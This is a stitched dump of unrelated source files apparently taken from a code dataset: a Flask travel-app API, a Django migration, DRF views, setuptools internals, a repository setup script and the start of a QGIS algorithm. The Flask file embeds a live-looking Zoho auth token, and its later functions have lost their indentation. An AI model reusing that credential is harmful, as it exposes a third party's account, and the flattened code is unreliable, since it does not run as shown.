        return jsonify(content), status.HTTP_500_INTERNAL_SERVER_ERROR
    cursor.execute("SELECT access_token FROM user WHERE username=%s;", (username_from,))
    result = cursor.fetchone()
    # Return a bad username error if the follower isn't in the table
    if not result:
        error_code = "user_unfollow_bad_username_from"
        cursor.close()
        content = {"success": False, "error_code": error_code}
        return jsonify(content), status.HTTP_200_OK
    # The token must be present AND match; previously a missing form token
    # compared equal to a NULL stored token (None == None) and passed.
    elif access_token is None or access_token != result[0]:
        error_code = "user_bad_access_token"
        cursor.close()
        content = {"success": False, "error_code": error_code}
        return jsonify(content), status.HTTP_200_OK
    # The followee must also exist.
    cursor.execute("SELECT * FROM user WHERE username=%s;", (username_to,))
    result = cursor.fetchone()
    if not result:
        error_code = "user_unfollow_bad_username_to"
        cursor.close()
        content = {"success": False, "error_code": error_code}
        return jsonify(content), status.HTTP_200_OK
    # Remove the follow edge (no-op if it does not exist).
    cursor.execute("DELETE FROM follow WHERE username_from=%s AND username_to=%s;",
                   (username_from, username_to))
    db.commit()
    cursor.close()
    content = {"success": True}
    return jsonify(content), status.HTTP_200_OK
# -------------------------------------------------------------------------------------------------------------------- #
# Delete User
@app.route("/api/user/remove", methods=["POST"])
def remove():
    """Delete the authenticated user's account.

    Form parameters: username, access_token.
    NOTE(review): only the `user` row is deleted here; rows in checkin /
    follow / achieve are presumably removed by ON DELETE CASCADE foreign
    keys — confirm the schema, otherwise they are orphaned or the DELETE
    fails.
    """
    # Read in remove input parameters
    username = request.form.get('username')  # String (a-z, A-Z, 0-9, -, _)
    access_token = request.form.get('access_token')
    # Reject missing or malformed parameters up front.
    check = check_for_none("remove", [("username", username)])
    if check is not None:
        return jsonify(check), status.HTTP_200_OK
    check2 = validate_parameters("remove", username=username)
    if check2 is not None:
        return jsonify(check2), status.HTTP_200_OK
    try:
        cursor = db.cursor()
    except Exception:  # was a bare except:; narrowed so SystemExit etc. still propagate
        error_code = "connection_to_database_failed"
        content = {"success": False, "error_code": error_code}
        print(traceback.format_exc())
        return jsonify(content), status.HTTP_500_INTERNAL_SERVER_ERROR
    cursor.execute("SELECT access_token FROM user WHERE username=%s;", (username,))
    result = cursor.fetchone()
    # Return a bad username error if the username isn't in the table
    if not result:
        error_code = "user_remove_bad_username"
        cursor.close()
        content = {"success": False, "error_code": error_code}
        return jsonify(content), status.HTTP_200_OK
    # The token must be present AND match; previously a missing form token
    # compared equal to a NULL stored token (None == None) and passed.
    elif access_token is None or access_token != result[0]:
        error_code = "user_bad_access_token"
        cursor.close()
        content = {"success": False, "error_code": error_code}
        return jsonify(content), status.HTTP_200_OK
    # Arguments are valid: remove the user row.
    cursor.execute("DELETE FROM user WHERE username=%s;", (username,))
    db.commit()
    cursor.close()
    content = {"success": True}
    return jsonify(content), status.HTTP_200_OK
# -------------------------------------------------------------------------------------------------------------------- #
# Verify Email
@app.route("/verify", methods=["GET"])
def email_verify():
    """Verify an email address via the token from the verification link.

    Query parameter: email_token. A successful verification clears the
    token to NULL, which is what login() checks to allow access.
    """
    email_token = request.args.get('email_token')
    if email_token is None:
        error_code = "invalid_email_token"
        content = {"success": False, "error_code": error_code}
        return jsonify(content), status.HTTP_200_OK
    try:
        cursor = db.cursor()
    except Exception:  # was a bare except:; narrowed so SystemExit etc. still propagate
        error_code = "connection_to_database_failed"
        content = {"success": False, "error_code": error_code}
        print(traceback.format_exc())
        return jsonify(content), status.HTTP_500_INTERNAL_SERVER_ERROR
    # The token must belong to some unverified user.
    cursor.execute("SELECT username FROM user WHERE email_token=%s;", (email_token,))
    result = cursor.fetchone()
    if not result:
        error_code = "bad_email_token"
        cursor.close()
        content = {"success": False, "error_code": error_code}
        return jsonify(content), status.HTTP_200_OK
    # Clearing the token marks the account as verified.
    cursor.execute("UPDATE user SET email_token = NULL WHERE email_token=%s;", (email_token,))
    db.commit()
    cursor.close()
    content = {"success": True}
    return jsonify(content), status.HTTP_200_OK
# -------------------------------------------------------------------------------------------------------------------- #
#email verification request
def send_email_verif(email_address, email_token):
    """Send the account-verification email through the Zoho mail API.

    The message contains a link to /verify?email_token=<token>. Delivery
    failures are left to the caller to handle (requests raises on timeout
    or connection errors).
    """
    # SECURITY: the API auth token is hardcoded in source; it should live in
    # configuration (e.g. alongside the DB credentials in db_config), not here.
    headers = {'Authorization': 'Zoho-authtoken a61e6765b5f28645c9621a7057f29973'}
    payload = {
        "fromAddress": "travelations@shreyas208.com",
        "toAddress": email_address,
        "subject": "Travelations Account Verification",
        "encoding": "UTF-8",
        "mailFormat": "html",
        "content": "Welcome to Travelation!<br />Please verify your account <a href=\"http://fa17-cs411-18.cs.illinois.edu/verify?email_token=" + email_token + "\">here</a>."
    }
    # timeout added: requests.post without one can block this request thread
    # indefinitely if the mail API hangs.
    requests.post('https://mail.zoho.com/api/accounts/5601770000000008001/messages',
                  json=payload, headers=headers, timeout=10)
# -------------------------------------------------------------------------------------------------------------------- #
# News Feed
@app.route("/api/user/feed", methods=["POST"])
def feed():
    """Return the 25 most recent checkins by users the caller follows.

    Form parameters: username, access_token.
    """
    # Read in feed input parameters
    username = request.form.get('username')  # String (a-z, A-Z, 0-9, -, _)
    access_token = request.form.get('access_token')
    # Reject missing or malformed parameters up front.
    check = check_for_none("feed", [("username", username)])
    if check is not None:
        return jsonify(check), status.HTTP_200_OK
    check2 = validate_parameters("feed", username=username)
    if check2 is not None:
        return jsonify(check2), status.HTTP_200_OK
    try:
        cursor = db.cursor()
    except Exception:  # was a bare except:; narrowed so SystemExit etc. still propagate
        error_code = "connection_to_database_failed"
        content = {"success": False, "error_code": error_code}
        print(traceback.format_exc())
        return jsonify(content), status.HTTP_500_INTERNAL_SERVER_ERROR
    cursor.execute("SELECT access_token FROM user WHERE username=%s;", (username,))
    result = cursor.fetchone()
    # Return a bad username error if the username isn't in the table
    if not result:
        error_code = "user_feed_bad_username"
        cursor.close()
        content = {"success": False, "error_code": error_code}
        return jsonify(content), status.HTTP_200_OK
    # The token must be present AND match; previously a missing form token
    # compared equal to a NULL stored token (None == None) and passed.
    elif access_token is None or access_token != result[0]:
        error_code = "user_bad_access_token"
        cursor.close()
        content = {"success": False, "error_code": error_code}
        return jsonify(content), status.HTTP_200_OK
    # Checkins by followed users, newest first, capped at 25.
    cursor.execute("SELECT username, accent_name, country.name AS country_name, checkin_time " +
                   "FROM checkin, city, country " +
                   "WHERE username IN " +
                   "(" +
                   "SELECT username_to " +
                   "FROM follow " +
                   "WHERE username_from = %s" +
                   ") AND " +
                   "checkin.city_id = city.id AND city.country = country.code "
                   "ORDER BY checkin_time DESC " +
                   "LIMIT 0, 25;", (username,))
    results = cursor.fetchall()
    cursor.close()
    checkins = [{"username": result[0], "accent_name": result[1], "country_name": result[2], "checkin_time": result[3]} for result in results]
    content = {"success": True, "checkins": checkins}
    return jsonify(content), status.HTTP_200_OK
# -------------------------------------------------------------------------------------------------------------------- #
# Root
@app.route("/")
def root():
return "You have reached our Flask server."
# -------------------------------------------------------------------------------------------------------------------- #
# Check if any of the parameters are None
def check_for_none(function_name, params):
for param in params:
if param[1] is None:
error_code = "user_" + function_name + "_empty_field"
content = {"success": False, "error_code": error_code}
return content
return None
# -------------------------------------------------------------------------------------------------------------------- #
# Validates parameters for different functions
def validate_parameters(function_name, username=None, username2=None, password=None, password2=None,
email_address=None, display_name=None, latitude=None, longitude=None):
# Check if username is valid
if username is not None:
if not all((c in ascii_letters + digits + '-' + '_') for c in username):
#if function_name == "follow" or function_name == "unfollow":
#error_code = "user_" + function_name + "_invalid_username_from"
#else:
#error_code = "user_" + function_name + "_invalid_username"
error_code = "user_" + function_name + "_bad_credentials"
content = {"success": False, "error_code": error_code}
return content
# Check if username is valid
if username2 is not None:
if not all((c in ascii_letters + digits + '-' + '_') for c in username2):
#if function_name == "follow" or function_name == "unfollow":
# error_code = "user_" + function_name + "_invalid_username_to"
#elif function_name == "search":
# error_code = "user_" + function_name + "_invalid_search_username"
#else:
# error_code = "user_" + function_name + "_invalid_username"
error_code = "user_" + function_name + "_bad_credentials"
content = {"success": False, "error_code": error_code}
return content
# Check if password is valid
if password is not None:
if (not all((c in ascii_letters + digits + punctuation) for c in password)) \
or (not (6 <= len(password) <= 256)):
#if function_name == "changePassword":
# error_code = "user_" + function_name + "_invalid_old_password"
#else:
# error_code = "user_" + function_name + "_invalid_password"
error_code = "user_" + function_name + "_bad_credentials"
content = {"success": False, "error_code": error_code}
return content
# Check if password2 is valid
if password2 is not None:
if (not all((c in ascii_letters + digits + punctuation) for c in password2)) \
or (not (6 <= len(password2) <= 256)):
#if function_name == "changePassword":
# error_code = "user_" + function_name + "_invalid_new_password"
#else:
# error_code = "user_" + function_name + "_invalid_password"
error_code = "user_" + function_name + "_bad_credentials"
content = {"success": False, "error_code": error_code}
return content
# Check if email_address is valid
if email_address is not None:
email_regex = re.compile(r"[^@]+@[^@]+\.[^@]+")
if not email_regex.match(email_address):
error_code = "user_" + function_name + "_invalid_email"
content = {"success": False, "error_code": error_code}
return content
# Check if display_name is valid
if display_name is not None:
if (not all((c in ascii_letters + digits + '-' + '_' + ' ') for c in display_name)) \
or (not (1 <= len(display_name) <= 256)):
error_code = "user_" + function_name + "_invalid_display_name"
content = {"success": False, "error_code": error_code}
return content
# Check if latitude is valid
if latitude is not None:
if not (-90 <= float(latitude) <= 90):
error_code = "user_" + function_name + "_invalid_latlong"
content = {"success": False, "error_code": error_code}
return content
# Check if longitude is valid
if longitude is not None:
if not (-180 <= float(longitude) <= 180):
error_code = "user_" + function_name + "_invalid_latlong"
content = {"success": False, "error_code": error_code}
return content
return None
# -------------------------------------------------------------------------------------------------------------------- #
# Runs the app
if __name__ == "__main__":
app.run()
| [
"gautham.bommannan@gmail.com"
] | gautham.bommannan@gmail.com |
020475e06a3527c5a07704bb84ea5c04a8b97fcf | 3f8aca7a66b717872ff6f4d811417c3861f514c2 | /django/airline/flights/migrations/0001_initial.py | 9cc5d610781220b9d7b6828ed790fa57f3b95898 | [] | no_license | anasahmed700/python-web-programming | 297f47cba76715df0fc576bcc6254eb926fdc40d | 505233cb76e33e00e7838bbab62740ac5c4ea01c | refs/heads/master | 2022-09-05T21:45:49.885195 | 2020-06-04T12:44:50 | 2020-06-04T12:44:50 | 269,036,613 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 606 | py | # Generated by Django 3.0.6 on 2020-06-02 08:05
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Flight',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('origin', models.CharField(max_length=64)),
('destination', models.CharField(max_length=64)),
('duration', models.IntegerField()),
],
),
]
| [
"anasahmed700@gmail.com"
] | anasahmed700@gmail.com |
6e69b5b44498b70dbb7ec604c2bc824d7cd54d73 | 31e10d5f9bbdf768a2b6aae68af0c2105b43120c | /web+多线程/miniweb框架/web服务器/application/utils.py | fc5a398094a52747dd43aa00a08d209b8d724c5b | [] | no_license | 664120817/python-test | 6d0ce82923b3e7974f393fc8590c5e47e4117781 | 418085378ca0db8019e4fa3b5564daebed0e6163 | refs/heads/master | 2023-02-16T13:10:55.403774 | 2022-08-02T17:01:52 | 2022-08-02T17:01:52 | 200,843,808 | 8 | 11 | null | 2023-02-15T16:53:44 | 2019-08-06T12:08:19 | Python | UTF-8 | Python | false | false | 435 | py | def create_http_response(status,response_body):
# 拼接响应
request_line = "HTTP/1.1 {}\r\n".format(status) # 请求行
request_header = "Server:python80WS/2.1;charset=UTF-8 \r\n" # 请求头
request_header += "Content-Type:text/html\r\n"
request_blank = "\r\n" # 请求空行
request_data = (request_line + request_header + request_blank).encode() + response_body # 整体拼接
return request_data | [
"51182039+664120817@users.noreply.github.com"
] | 51182039+664120817@users.noreply.github.com |
5e739a9617a64bc798515aecdab7050c7538a08e | 9141400a88839683c5bc87a6174883ef59131db8 | /Classification/random_forest_pipeline.py | 2a8c511698f734f3489b837edc97a4f363cbf3c8 | [] | no_license | Arunkalyan/MLModel | 1fed51d5638c83c4e463d141f3cd88e64de7ab33 | de24420c9100dab3a5689261eb89080173664836 | refs/heads/master | 2021-01-11T21:13:14.316169 | 2017-02-15T04:41:06 | 2017-02-15T04:41:06 | 79,271,500 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 308 | py | #!/usr/bin/python
from math import sqrt
def randomForest_pipeline(total_features):
pipe = Pipeline(steps=[
('clf', LogisticRegression())
])
parameters = {'n_jobs': [-1],
'max_features': [sqrt(total_features)]
}
return pipe, parameters
| [
"noreply@github.com"
] | noreply@github.com |
1576e37fbebbe3a657de3c680f4091835cf9f3b4 | b82d3d0adda51667d8a87ff8a85d0a246777f7db | /scripts/googlebooks/bindb/test_bindb_ac_encoding.py | b125fcbdfd07726d5876338e828dd6f08eb218df | [] | no_license | kkom/steganography | 2da3352fd92f4cece89d2a7034a068aa292c97ba | fb0981dc8f1aa7367801043aefc422921bb46d8b | refs/heads/master | 2020-12-05T00:51:25.873394 | 2014-06-01T23:16:22 | 2014-06-01T23:16:22 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,600 | py | #!/usr/bin/env python3
from pysteg.coding.rational_ac import encode
from pysteg.googlebooks import bindb
from pysteg.googlebooks.ngrams_analysis import normalise_and_explode_tokens
from pysteg.googlebooks.ngrams_analysis import text2token_strings
# Set language model parameters
n = 5
start = 322578
end = 322577
beta = 1
gamma = 0.1
offset = 0
print("n: {n}".format(**locals()))
print("start: {start}".format(**locals()))
print("end: {end}".format(**locals()))
print("beta: {beta}".format(**locals()))
print("gamma: {gamma}".format(**locals()))
print("offset: {offset}".format(**locals()))
print()
# Load language model
lm = bindb.BinDBLM("/Users/kkom/Desktop/bindb-normalised/counts-consistent-tables", n, start, end, beta, gamma, offset)
# Load index
with open("/Users/kkom/Desktop/bindb-normalised/index", "r") as f:
index = bindb.BinDBIndex(f)
# Create the sentence
text = """At the Primorsky polling station in Mariupol, a large crowd is
gathered outside, waiting to vote. There is a crush of people inside.
Organisation is chaotic at best. There are no polling booths: people vote at
the registration desks. People's details are hastily scribbled on generic
forms. There is also a collection for money towards funding the Donetsk
People's Republic."""
token_strings = normalise_and_explode_tokens(text2token_strings(text))
token_indices = tuple(map(index.s2i, token_strings))
print(text)
print()
print(" ".join(token_strings))
print()
print(token_indices)
print()
interval = encode(lm.conditional_interval, token_indices, verbose=True)
print("Decoded to: " + str(interval))
| [
"5056119+kkom@users.noreply.github.com"
] | 5056119+kkom@users.noreply.github.com |
355bad883e1856a58efb8f5443bb7e97796d4067 | baf5d1e7b8cd8fda0d3cc6f7114c5fa3bd3bc090 | /4.4.py | b1f77d6c0738c76bb9c42116b90fce573199298f | [] | no_license | joc44/PtyhonPractice | 6b13d791cb3265cebdbc9f11cb2252837ff1067e | 81302d40741bd5fa00fe238f5adc7e12554cdafa | refs/heads/main | 2023-02-23T06:28:13.075327 | 2021-01-25T20:30:18 | 2021-01-25T20:30:18 | 332,872,341 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 223 | py | #Írjon egy programot, ami kiír egy 12 számból álló sorozatot, aminek minden tagja vagy
#egyenlő az előző taggal, vagy annak háromszorosa
a = 1
b = 1
while b < 13:
print(a)
a = a * 3
b += 1
| [
"noreply@github.com"
] | noreply@github.com |
3de69451167cf6131f831c5e279f59ff0f2bb404 | 0b460481c25f884abdaa1d1b54e513169b19c4b0 | /user/views.py | 8d350274285948617d361a11234d205a3960eb68 | [] | no_license | mubasharehsan/reservation_task | 3540d121090c9be8564825b0cd12599bbbf6b2ac | 51df08c662b969d68eb2d3c2fe8ef5da78351cf3 | refs/heads/master | 2022-05-06T08:42:12.725775 | 2020-05-19T07:48:39 | 2020-05-19T07:48:39 | 156,724,899 | 0 | 0 | null | 2022-04-22T21:00:41 | 2018-11-08T15:09:09 | Python | UTF-8 | Python | false | false | 988 | py | from rest_framework.generics import CreateAPIView, RetrieveUpdateAPIView, ListAPIView
from rest_framework.permissions import IsAuthenticated, AllowAny
from .permissions import StaffPermission, NotLoggedIn
from .serializers import ProfileSerializer, UserRegisterSerializer
from .models import Profile
class ProfileView(RetrieveUpdateAPIView):
"""
This viewset provides `profile-data` and allows to `update` it.
"""
serializer_class = ProfileSerializer
permission_classes = (IsAuthenticated,)
def get_object(self):
return self.request.user.profile
class RegisterApiView(CreateAPIView):
"""
This viewset register new user
"""
serializer_class = UserRegisterSerializer
permission_classes = (AllowAny, NotLoggedIn)
class UserListApiView(ListAPIView):
"""
List all users if admin
"""
serializer_class = ProfileSerializer
queryset = Profile.objects.all()
permission_classes = (IsAuthenticated, StaffPermission)
| [
"noreply@github.com"
] | noreply@github.com |
4ab479c270e0bbf4c306512a937ec81e262f746d | cb00fe13083728c540076600e41710081b7ef0ce | /site/venv/Lib/site-packages/setuptools/__init__.py | 1258043a1b3d8fa9c3586104a43f761e58c9972d | [] | no_license | Wamadahama/ner-framework | 069464342512bab9f429b11be735f6cb487afb74 | 4cb699469ec8733f74cb67f67af995e734231974 | refs/heads/master | 2023-03-28T14:28:42.791453 | 2021-03-29T22:27:33 | 2021-03-29T22:27:33 | 209,624,138 | 4 | 1 | null | null | null | null | UTF-8 | Python | false | false | 7,272 | py | """Extensions to the 'distutils' for large or complex distributions"""
import os
import functools
import distutils.core
import distutils.filelist
import re
from distutils.errors import DistutilsOptionError
from distutils.util import convert_path
from fnmatch import fnmatchcase
from ._deprecation_warning import SetuptoolsDeprecationWarning
from setuptools.extern.six import PY3, string_types
from setuptools.extern.six.moves import filter, map
import setuptools.version
from setuptools.extension import Extension
from setuptools.dist import Distribution, Feature
from setuptools.depends import Require
from . import monkey
__metaclass__ = type
__all__ = [
'setup', 'Distribution', 'Feature', 'Command', 'Extension', 'Require',
'SetuptoolsDeprecationWarning',
'find_packages'
]
if PY3:
__all__.append('find_namespace_packages')
__version__ = setuptools.version.__version__
bootstrap_install_from = None
# If we run 2to3 on .py files, should we also convert docstrings?
# Default: yes; assume that we can detect doctests reliably
run_2to3_on_doctests = True
# Standard package names for fixer packages
lib2to3_fixer_packages = ['lib2to3.fixes']
class PackageFinder:
"""
Generate a list of all Python packages found within a directory
"""
@classmethod
def find(cls, where='.', exclude=(), include=('*',)):
"""Return a list all Python packages found within directory 'where'
'where' is the root directory which will be searched for packages. It
should be supplied as a "cross-platform" (i.e. URL-style) path; it will
be converted to the appropriate local path syntax.
'exclude' is a sequence of package names to exclude; '*' can be used
as a wildcard in the names, such that 'foo.*' will exclude all
subpackages of 'foo' (but not 'foo' itself).
'include' is a sequence of package names to include. If it's
specified, only the named packages will be included. If it's not
specified, all found packages will be included. 'include' can contain
shell style wildcard patterns just like 'exclude'.
"""
return list(cls._find_packages_iter(
convert_path(where),
cls._build_filter('ez_setup', '*__pycache__', *exclude),
cls._build_filter(*include)))
@classmethod
def _find_packages_iter(cls, where, exclude, include):
"""
All the packages found in 'where' that pass the 'include' filter, but
not the 'exclude' filter.
"""
for root, dirs, files in os.walk(where, followlinks=True):
# Copy dirs to iterate over it, then empty dirs.
all_dirs = dirs[:]
dirs[:] = []
for dir in all_dirs:
full_path = os.path.join(root, dir)
rel_path = os.path.relpath(full_path, where)
package = rel_path.replace(os.path.sep, '.')
# Skip directory trees that are not valid packages
if ('.' in dir or not cls._looks_like_package(full_path)):
continue
# Should this package be included?
if include(package) and not exclude(package):
yield package
# Keep searching subdirectories, as there may be more packages
# down there, even if the parent was excluded.
dirs.append(dir)
@staticmethod
def _looks_like_package(path):
"""Does a directory look like a package?"""
return os.path.isfile(os.path.join(path, '__init__.py'))
@staticmethod
def _build_filter(*patterns):
"""
Given a list of patterns, return a callable that will be true only if
the input matches at least one of the patterns.
"""
return lambda name: any(fnmatchcase(name, pat=pat) for pat in patterns)
class PEP420PackageFinder(PackageFinder):
@staticmethod
def _looks_like_package(path):
return True
find_packages = PackageFinder.find
if PY3:
find_namespace_packages = PEP420PackageFinder.find
def _install_setup_requires(attrs):
# Note: do not use `setuptools.Distribution` directly, as
# our PEP 517 backend patch `distutils.core.Distribution`.
dist = distutils.core.Distribution(dict(
(k, v) for k, v in attrs.items()
if k in ('dependency_links', 'setup_requires')
))
# Honor setup.cfg's options.
dist.parse_config_files(ignore_option_errors=True)
if dist.setup_requires:
dist.fetch_build_eggs(dist.setup_requires)
def setup(**attrs):
# Make sure we have any requirements needed to interpret 'attrs'.
_install_setup_requires(attrs)
return distutils.core.setup(**attrs)
setup.__doc__ = distutils.core.setup.__doc__
_Command = monkey.get_unpatched(distutils.core.Command)
class Command(_Command):
__doc__ = _Command.__doc__
command_consumes_arguments = False
def __init__(self, dist, **kw):
"""
Construct the command for dist, updating
vars(self) with any keyword parameters.
"""
_Command.__init__(self, dist)
vars(self).update(kw)
def _ensure_stringlike(self, option, what, default=None):
val = getattr(self, option)
if val is None:
setattr(self, option, default)
return default
elif not isinstance(val, string_types):
raise DistutilsOptionError("'%s' must be a %s (got `%s`)"
% (option, what, val))
return val
def ensure_string_list(self, option):
r"""Ensure that 'option' is a list of strings. If 'option' is
currently a string, we split it either on /,\s*/ or /\s+/, so
"foo bar baz", "foo,bar,baz", and "foo, bar baz" all become
["foo", "bar", "baz"].
"""
val = getattr(self, option)
if val is None:
return
elif isinstance(val, string_types):
setattr(self, option, re.split(r',\s*|\s+', val))
else:
if isinstance(val, list):
ok = all(isinstance(v, string_types) for v in val)
else:
ok = False
if not ok:
raise DistutilsOptionError(
"'%s' must be a list of strings (got %r)"
% (option, val))
def reinitialize_command(self, command, reinit_subcommands=0, **kw):
cmd = _Command.reinitialize_command(self, command, reinit_subcommands)
vars(cmd).update(kw)
return cmd
def _find_all_simple(path):
"""
Find all files under 'path'
"""
results = (
os.path.join(base, file)
for base, dirs, files in os.walk(path, followlinks=True)
for file in files
)
return filter(os.path.isfile, results)
def findall(dir=os.curdir):
"""
Find all files under 'dir' and return the list of full filenames.
Unless dir is '.', return full filenames with dir prepended.
"""
files = _find_all_simple(dir)
if dir == os.curdir:
make_rel = functools.partial(os.path.relpath, start=dir)
files = map(make_rel, files)
return list(files)
# Apply monkey patches
monkey.patch_all()
| [
"evanscruzen@gmail.com"
] | evanscruzen@gmail.com |
1fbe0a4108c18ccc55dfbbaa1af3c6e0af91ea16 | 12fa96a5e304ae85fd65726fee0b58bf1b4d1567 | /PlacementBuddy/Newsfeed/admin.py | 3ae5fc89b086708f148243f1ef59e42e4572ee3a | [] | no_license | ramkishor-hosamane/Placement-Buddy | eb1b16c4901fc0ee3a81f9373963910bb756ca5e | 4ed65cea3f13129143d64178cb5ea258e3a9ca81 | refs/heads/main | 2023-02-03T08:45:01.564191 | 2020-12-21T19:04:17 | 2020-12-21T19:04:17 | 319,855,391 | 0 | 0 | null | 2020-12-12T13:17:17 | 2020-12-09T05:47:15 | HTML | UTF-8 | Python | false | false | 237 | py | from django.contrib import admin
from .models import Post,Comment,FavouritePost,Question
# Register your models here.
admin.site.register(Post)
admin.site.register(Comment)
admin.site.register(FavouritePost)
admin.site.register(Question) | [
"ramhosamane@gmail.com"
] | ramhosamane@gmail.com |
ee9ea4d11f545f46aa88dcf699a6500010c37f2d | c6d9e353d19e0b92da72602ce274493dbb179525 | /Setup_custom.py | ca095135168082bb68b2205c98650d75d777c9fc | [
"BSL-1.0",
"Python-2.0",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | davidbrownell/Common_cpp_Common | a337f0d589316f28950e93acd518d4e82b7cc14a | 7346273b79628514af1c584c447003a638def15d | refs/heads/master | 2022-03-01T19:31:12.571884 | 2022-01-03T17:56:37 | 2022-01-03T17:56:37 | 187,749,343 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,579 | py | # ----------------------------------------------------------------------
# |
# | Setup_custom.py
# |
# | David Brownell <db@DavidBrownell.com>
# | 2018-05-03 22:12:13
# |
# ----------------------------------------------------------------------
# |
# | Copyright David Brownell 2018-22.
# | Distributed under the Boost Software License, Version 1.0.
# | (See accompanying file LICENSE_1_0.txt or copy at http://www.boost.org/LICENSE_1_0.txt)
# |
# ----------------------------------------------------------------------
"""Performs repository-specific setup activities."""
# ----------------------------------------------------------------------
# |
# | To setup an environment, run:
# |
# | Setup(.cmd|.ps1|.sh) [/debug] [/verbose] [/configuration=<config_name>]*
# |
# ----------------------------------------------------------------------
import os
import shutil
import sys
from collections import OrderedDict
import CommonEnvironment
# ----------------------------------------------------------------------
_script_fullpath = CommonEnvironment.ThisFullpath()
_script_dir, _script_name = os.path.split(_script_fullpath)
# ----------------------------------------------------------------------
# <Missing function docstring> pylint: disable = C0111
# <Line too long> pylint: disable = C0301
# <Wrong hanging indentation> pylint: disable = C0330
# <Class '<name>' has no '<attr>' member> pylint: disable = E1103
# <Unreachable code> pylint: disable = W0101
# <Wildcard import> pylint: disable = W0401
# <Unused argument> pylint: disable = W0613
fundamental_repo = os.getenv("DEVELOPMENT_ENVIRONMENT_FUNDAMENTAL")
assert os.path.isdir(fundamental_repo), fundamental_repo
sys.path.insert(0, fundamental_repo)
from RepositoryBootstrap import * # <Unused import> pylint: disable = W0614
from RepositoryBootstrap.SetupAndActivate import CurrentShell # <Unused import> pylint: disable = W0614
from RepositoryBootstrap.SetupAndActivate.Configuration import * # <Unused import> pylint: disable = W0614
del sys.path[0]
from _custom_data import _CUSTOM_DATA
# ----------------------------------------------------------------------
# There are two types of repositories: Standard and Mixin. Only one standard
# repository may be activated within an environment at a time while any number
# of mixin repositories can be activated within a standard repository environment.
# Standard repositories may be dependent on other repositories (thereby inheriting
# their functionality), support multiple configurations, and specify version
# information for tools and libraries in themselves or its dependencies.
#
# Mixin repositories are designed to augment other repositories. They cannot
# have configurations or dependencies and may not be activated on their own.
#
# These difference are summarized in this table:
#
# Standard Mixin
# -------- -----
# Can be activated in isolation X
# Supports configurations X
# Supports VersionSpecs X
# Can be dependent upon other repositories X
# Can be activated within any other Standard X
# repository
#
# Consider a script that wraps common Git commands. This functionality is useful
# across a number of different repositories, yet doesn't have functionality that
# is useful on its own; it provides functionality that augments other repositories.
# This functionality should be included within a repository that is classified
# as a mixin repository.
#
# To classify a repository as a Mixin repository, decorate the GetDependencies method
# with the MixinRepository decorator.
#
# @MixinRepository # <-- Uncomment this line to classify this repository as a mixin repository
def GetDependencies():
"""
Returns information about the dependencies required by this repository.
The return value should be an OrderedDict if the repository supports multiple configurations
(aka is configurable) or a single Configuration if not.
"""
d = OrderedDict()
if CurrentShell.CategoryName == "Windows":
architectures = ["x64", "x86"]
else:
# Cross compiling on Linux is much more difficult on Linux than it is on
# Windows. Only support the current architecture.
architectures = [CurrentShell.Architecture]
for architecture in architectures:
d[architecture] = Configuration(
architecture,
[
Dependency(
"0EAA1DCF22804F90AD9F5A3B85A5D706",
"Common_Environment",
"python36",
"https://github.com/davidbrownell/Common_Environment_v3.git",
)
],
)
return d
# ----------------------------------------------------------------------
def GetCustomActions(debug, verbose, explicit_configurations):
"""
Returns an action or list of actions that should be invoked as part of the setup process.
Actions are generic command line statements defined in
<Common_Environment>/Libraries/Python/CommonEnvironment/v1.0/CommonEnvironment/Shell/Commands/__init__.py
that are converted into statements appropriate for the current scripting language (in most
cases, this is Bash on Linux systems and Batch or PowerShell on Windows systems.
"""
actions = []
for tool, version_infos in _CUSTOM_DATA:
for version, operating_system_infos in version_infos:
for operating_system, hash in operating_system_infos:
if CurrentShell.CategoryName != operating_system:
continue
tool_dir = os.path.join(
_script_dir,
"Tools",
tool,
version,
operating_system,
)
assert os.path.isdir(tool_dir), tool_dir
actions += [
CurrentShell.Commands.Execute(
'python "{script}" Install "{tool} - {version}" "{uri}" "{dir}" "/unique_id={hash}" /unique_id_is_hash'.format(
script=os.path.join(
os.getenv("DEVELOPMENT_ENVIRONMENT_FUNDAMENTAL"),
"RepositoryBootstrap",
"SetupAndActivate",
"AcquireBinaries.py",
),
tool=tool,
version=version,
uri=CommonEnvironmentImports.FileSystem.FilenameToUri(
os.path.join(tool_dir, "Install.7z"),
),
dir=tool_dir,
hash=hash,
),
),
]
# Perform actions that must be completed after all other actions have completed
actions.append(
CurrentShell.Commands.Execute(
'python "{}"'.format(os.path.join(_script_dir, "Setup_epilogue.py")),
),
)
return actions
| [
"db@DavidBrownell.com"
] | db@DavidBrownell.com |
6bb17ba7ec485b1287ac16c15187bb1d7a62ed84 | 70fc02e04892bc099e48f75ccbe339feb1317c0c | /HistogramMatching.py | b582fa97fc89e911cc7c3b94b0823d940bc771f1 | [] | no_license | yougis/geoscript | e1a329763396fbebb674eea2c08fe06d1034e17c | f42ad416703af85f203662ba31724158cd888e11 | refs/heads/master | 2021-06-03T05:02:10.788966 | 2021-04-22T23:25:28 | 2021-04-22T23:25:28 | 38,092,844 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 21,235 | py | # -*- coding: utf-8 -*-
"""
***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
***************************************************************************
"""
from qgis.PyQt.QtCore import QCoreApplication
from qgis.core import (QgsProcessing,
QgsFeatureSink,
QgsRectangle,
QgsRasterLayer,
QgsProcessingException,
QgsProcessingAlgorithm,
QgsProcessingParameterNumber,
QgsProcessingParameterRasterLayer,
QgsProcessingParameterFeatureSource,
QgsProcessingParameterFileDestination,
QgsProcessingOutputBoolean)
from qgis import processing
from osgeo import gdal, osr
import numpy as np
import os
class HistogramMatching(QgsProcessingAlgorithm):
INPUT = 'INPUT'
REFERENCE = 'REFERENCE'
MASK = 'MASK'
DESATURATION = 'DESATURATION'
SATURATION = 'SATURATION'
DECOUPE = 'DECOUPE'
OUTPUT = 'OUTPUT'
def tr(self, string):
return QCoreApplication.translate('Processing', string)
def createInstance(self):
